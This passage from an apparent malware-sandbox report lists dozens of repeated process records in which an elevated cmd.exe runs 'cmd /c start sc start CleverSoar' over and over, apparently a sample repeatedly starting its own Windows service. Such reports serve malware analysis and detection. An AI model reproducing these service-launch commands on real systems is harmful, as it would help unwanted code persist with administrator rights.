                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:17
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:18
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:19
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:20
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:21
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:22
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:23
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:24
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:25
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:26
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:27
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:28
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:29
                          Start time:21:42:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:30
                          Start time:21:42:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:31
                          Start time:21:42:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:32
                          Start time:21:42:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:33
                          Start time:21:42:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:34
                          Start time:21:42:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:35
                          Start time:21:42:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:36
                          Start time:21:42:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:37
                          Start time:21:42:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:38
                          Start time:21:42:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:39
                          Start time:21:42:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:40
                          Start time:21:42:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:41
                          Start time:21:42:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:42
                          Start time:21:42:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:43
                          Start time:21:42:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:44
                          Start time:21:42:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:45
                          Start time:21:42:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:46
                          Start time:21:42:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:47
                          Start time:21:42:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:48
                          Start time:21:42:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:49
                          Start time:21:42:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:50
                          Start time:21:42:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:51
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:52
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:54
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:55
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:56
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:57
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:58
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:59
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:60
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:61
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:62
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:63
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:64
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:65
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:66
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:67
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:68
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:69
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:70
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:71
                          Start time:21:42:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:72
                          Start time:21:42:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:73
                          Start time:21:42:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:74
                          Start time:21:42:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:75
                          Start time:21:42:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:76
                          Start time:21:42:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:77
                          Start time:21:42:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:78
                          Start time:21:42:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:79
                          Start time:21:42:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:80
                          Start time:21:42:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:81
                          Start time:21:42:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:82
                          Start time:21:42:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:83
                          Start time:21:42:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:84
                          Start time:21:42:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:85
                          Start time:21:42:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:86
                          Start time:21:42:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:87
                          Start time:21:42:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:88
                          Start time:21:42:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
